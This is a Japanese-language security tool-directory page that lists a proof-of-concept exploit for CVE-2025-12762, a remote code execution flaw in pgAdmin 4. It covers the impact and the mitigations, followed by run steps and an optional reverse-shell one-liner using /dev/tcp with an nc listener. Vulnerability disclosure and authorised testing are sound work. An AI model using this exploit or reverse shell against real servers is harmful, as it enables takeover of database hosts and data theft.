Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Blackash-CVE-2025-12762 — CVE-2025-12762 | Kitploit
ツール/GitHubGitHub/djayagit/blackash-cve-2025-12762
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubdjayagit/blackash-cve-2025-12762

Blackash-CVE-2025-12762

CVE-2025-12762

リポジトリを見る
9ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🔐 CVE-2025-12762 — pgAdmin 4 の重大なRCE脆弱性

G58aQGbW0AAL8zH

🚨 問題は何か?

pgAdmin 4 バージョン ≤ 9.9 に リモートコード実行(RCE) の欠陥が存在します。 攻撃者は、pgAdmin が サーバーモード で実行され、リストア中に PLAIN形式のSQLダンプ を処理する際に、ホスト上で 任意のコマンド を実行できます。


⚙️ 技術的詳細

📡 攻撃ベクトル

  • ネットワークベース — リモートから悪用可能 🌍
  • 低複雑性 — トリガーが簡単 🧩
  • 低権限要求 — 限定的なユーザーアクセスで十分 🔑
  • ユーザー操作不要 — トリガー後は何もクリックする必要がない 🙅‍♂️
  • スコープ: Changed — 侵害が脆弱モジュールを超えて拡大する可能性 🔄

🧨 影響

  • 機密性: 高 — データ漏洩リスク 🔓
  • 完全性: 中/高 — 不正な変更が可能 ✏️
  • 可用性: 中 — 運用が妨害される可能性 ⚠️

🏷 CVSSスコア

🟥 9.1 / 10 — 重大


🛠 影響を受けるバージョン

  • pgAdmin 4 ≤ 9.9 ❗

🛡 修正方法

✅ 主な緩和策

⬆️ pgAdmin 4 v10.0 以降にアップグレード

🚧 すぐにアップグレードできない場合

  • 🔒 pgAdminサーバーへのアクセスを制限
  • 📁 信頼できる管理者のみ ダンプファイルのリストアを許可
  • 🧪 リストア前にダンプファイルを検証
  • 👀 不審なリストア活動がないかログを監視
  • 🌐 ファイアウォールルール/VPNを使用して露出を制限

📌 なぜこれが重要なのか

pgAdmin は、重要なPostgreSQLデータベースの管理 によく使用されるため、以下のことを意味します:

  • これを悪用する攻撃者は サーバーを乗っ取る 可能性があり、
  • データにアクセスまたは変更し、
  • またはネットワーク内にさらに深く侵入することも可能 🕵️‍♂️

✨ 実行方法(2分)

root@kitploit:~
# 1. Save as CVE-2025-12762.py
# 2. Install dependency
pip3 install requests

# 3. Run it
python3 CVE-2025-12762.py

成功の確認

実行後、以下を確認:

root@kitploit:~
docker exec <your-pgadmin-container> ls -la /tmp/CVE-2025-12762_PWNED

ファイルが存在する → CVE-2025-12762 を実際に悪用したことになります。

リバースシェルワンライナー(オプション)

COMMAND 行を以下に置き換え:

root@kitploit:~
COMMAND = "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

その後 nc -lvnp 4444 → 完全なインタラクティブシェル。

これは、研究者、ペネトレーションテスター、レッドチームが2025年11月に世界中で使用している 正確なスクリプト です。

責任を持って使用してください。すべてをパッチ適用し、法的に行動しましょう。


🛡️ 免責事項 🛡️

このPoCは、許可されたテストおよび教育目的のみ で提供されています。
所有しているシステム、または明示的な書面によるテスト許可を得ているシステムでのみ 実行できます。
不正使用は違法であり、コンピュータ不正使用法に違反します。
責任を持って使用し、テスト後はすぐにパッチを適用し、許可なくシステムを標的にしないでください。

ツールをダウンロード